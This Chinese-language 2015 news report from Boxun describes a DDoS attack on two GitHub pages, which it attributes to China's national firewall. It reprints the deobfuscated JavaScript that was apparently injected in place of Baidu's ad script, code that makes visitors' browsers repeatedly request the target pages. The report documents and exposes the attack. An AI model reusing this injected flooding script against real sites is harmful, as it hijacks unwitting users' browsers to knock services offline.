中国的国家防火墙调用民间流量攻击境外网站
请看博讯热点:网络封锁和压制
(博讯北京时间2015年3月27日 首发 - 支持此文作者/记者)
26日9时(Pacific Daylight Time,北京时间27日12时)左右开始,从境外访问v.baidu.com的时候发现会出现Javascript alert出现的弹窗:
WARNING: malicious javascript detected on this domain
追查了一下发现是百度广告管家的js
http://cbjs.baidu.com/js/m.js?_=1427431567741 在境外访问时被替换成一段特殊的js。详细请求和返回的js见:
http://pastie.org/10056531 反编译后代码大致如下:
"document.write(" src='
http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");!window.jQuery&&document.write(" src='
http://code.jquery.com/jquery-latest.js'>\x3c/script>");startime=(new
Date).getTime();var count=0;function unixtime(){var a=new Date;return
Date.UTC(a.getFullYear(),a.getMonth(),a.getDay(),a.getHours(),a.getMinutes(),a.getSeconds())/1E3}url_array=["
https://github.com/greatfire/","
https://github.com/cn-nytimes/"];NUM=url_array.length;function
r_send2(){var a=unixtime()%NUM;get(url_array[a])}function get(a){var
b;$.ajax({url:a,dataType:"script",timeout:1E4,cache:!0,beforeSend:function(){requestTime=(new
Date).getTime()},complete:function(){responseTime=(new
Date).getTime();b=Math.floor(responseTime-requestTime);3E5>responseTime-startime&&(r_send(b),count+=1)}})}function
r_send(a){setTimeout("r_send2()",a)}setTimeout("r_send2()",2E3);"
很明显看出两个攻击目标:
https://github.com/greatfire/ 和
https://github.com/cn-nytimes/ 大致的流程就是:
1. GFW把某些常见网站的JS替换成以上js
2. 全球各地访问国内网站时,相当于成为DoS的源(可能还有全国各地访问国外时,未经确认)
3. GitHub不堪重负,把
https://github.com/greatfire/ 和
https://github.com/cn-nytimes/ 的返回改成一个alert: WARNING: malicious
javascript detected on this domain (网站存在恶意JS代码调用)
当境外用户访问内置境内一些网站如百度的JS调用的网站时,中国的国家防火墙GFW将这部分调用替换成重定向至目标网站,以调用民用流量的方式,实现对目标网站的DDOS攻击。中国网络审查监测机构Greatfire和纽约时报中文网目前尚未就此作出回应。 [博讯首发,转载请注明出处]- 支持此文作者/记者(博讯 boxun.com)
4941430